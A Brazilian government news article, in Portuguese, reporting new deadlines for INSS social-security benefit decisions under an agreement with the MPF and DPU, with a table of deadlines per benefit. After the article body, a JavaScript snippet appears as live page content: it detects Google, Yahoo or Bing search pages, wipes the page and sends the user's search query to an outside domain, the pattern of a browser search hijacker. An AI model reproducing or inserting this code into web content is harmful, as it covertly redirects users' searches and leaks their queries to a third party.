Concessão de benefícios do INSS fica mais rápida a partir desta quinta

Novos prazos são fruto de acordo entre a instituição, o MPF e a DPU

Instituto Nacional do Seguro Social (INSS)

A partir desta quinta-feira (10) começam a valer os novos prazos para concessão de benefícios do INSS. As novas datas foram fruto de acordo da instituição e de outros órgãos do governo federal com o Ministério Público Federal (MPF) e a Defensoria Pública da União (DPU).

De acordo com o presidente do INSS, Leonardo Rolim, o acordo firmado vai ao encontro das ações que a instituição já vem dotando desde 2020 para reduzir o tempo de espera do segurado. “Contratamos servidores temporários; ampliamos as equipes de análise em 22%; ampliamos o número de benefícios concedidos de forma automatizada; realizamos mutirões para os benefícios mais solicitados, como auxílio-maternidade e pensão por morte, entre outras ações”, afirma.

Confira a seguir os novos prazos:

Benefício assistencial à pessoa com deficiência 90 dias
Benefício assistencial ao idoso 90 dias
Aposentadorias, salvo por invalidez 90 dias
Aposentadoria por invalidez comum e acidentária 45 dias
Salário maternidade 30 dias
Pensão por morte 60 dias
Auxílio reclusão 60 dias

Caso os prazos não sejam cumpridos, haverá o pagamento de juros de mora ao segurado, e o pedido será encaminhado para a Central Unificada para o Cumprimento Emergencial que terá um prazo de dez dias para a conclusão da análise.

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

Comentários

Compartilhar
Publicado por
Agência Brasil